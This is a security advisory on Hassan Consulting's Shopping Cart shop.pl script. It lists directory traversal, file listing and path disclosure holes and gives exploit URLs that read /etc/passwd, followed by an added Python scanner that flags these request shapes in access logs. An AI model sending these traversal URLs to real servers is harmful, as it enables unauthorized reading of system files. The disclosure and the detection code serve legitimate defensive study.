Hassan Consulting's Shopping Cart Version 1.x (cgi-bin/shop.pl) contains remote vulnerabilities, including directory traversal with file read ability, file listing, and path disclosure. Exploit URLs included.
85283352f70d94548d2b56de0d97bcf80906908ef932baf0b3a815cdc3e97361
Hassan Consulting's Shopping Cart Version 1.x
Shopping cart issues: simple path disclosure, directory traversal with file read ability, and, in some cases, listing of files in all directories.
Which of these apply just depends on the version of the code.
Vendor of SHOP.pl: Hassan Consulting (above). Multiple holes at various patch levels.
<d0tslash> http://www.irata.com/cgi-local/shop2.pl/page=.*
http://www.xxxxxxxxxxx.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd
http://www.xxxxxxxxx/cgi-local/shop.pl/SID=947574241.3380378/page=../
http://www.xxxxxxxx.com/cgi-bin/shop.pl/page=../../../../../../../../etc/passwd
http://www.xxxxxxxx.com/cgi-local/shop.pl/page=./produck_list
http://www.xxxxxxxx.com/cgi-local/shop.pl/page=
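
Added example (not part of the original advisory and not vendor code): a log scanner that flags requests to shop.pl whose page= value has one of the shapes shown in the URLs above, including percent-encoded forms. The access-log format, the label names and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed common/combined log format; the script pattern covers shop.pl and shop2.pl.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT_RE = re.compile(r"/shop\d*\.pl(/.*)?$", re.IGNORECASE | re.DOTALL)

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so %2e%2e and %252e%252e both become '..'."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def page_value(uri):
    """Decoded page= value from the script's path-info, or None if there is none."""
    match = SCRIPT_RE.search(decode_fully(uri.split("?", 1)[0]))
    path_info = match.group(1) if match else None
    if not path_info or "/page=" not in path_info:
        return None
    return path_info.split("/page=", 1)[1]

def classify(value):
    """Label a page= value by its shape; None means no value or nothing suspicious."""
    if not value:
        return "empty-page" if value == "" else None
    segments = re.split(r"[\\/]", value)
    if ".." in segments:
        return "dot-dot"
    if re.search(r"[*\[\]{}|]", value):
        return "wildcard"
    return "dot-segment" if "." in segments else None

def scan(lines):
    """Return (line_number, label) for each log line with a suspicious page= value."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        label = classify(page_value(m.group(1))) if m else None
        if label:
            hits.append((n, label))
    return hits

# Constructed sample entries (documentation address 192.0.2.10), not real traffic.
SAMPLE_LOG = ['192.0.2.10 - - [01/Jan/2000:00:00:00 +0000] "GET %s HTTP/1.0" 200 0' % uri for uri in (
    "/cgi-local/shop.pl/page=catalog.html",
    "/cgi-local/shop.pl/SID=1.2/page=../",
    "/cgi-bin/shop.pl/page=%252e%252e%2f%2e%2e/etc/passwd",
    "/cgi-local/shop2.pl/page=.*",
    "/cgi-local/shop.pl/page=",
    "/index.html")]
```

Calling scan(SAMPLE_LOG) returns the line numbers and labels of the four flagged entries; the ordinary catalog request and the unrelated /index.html request are not reported.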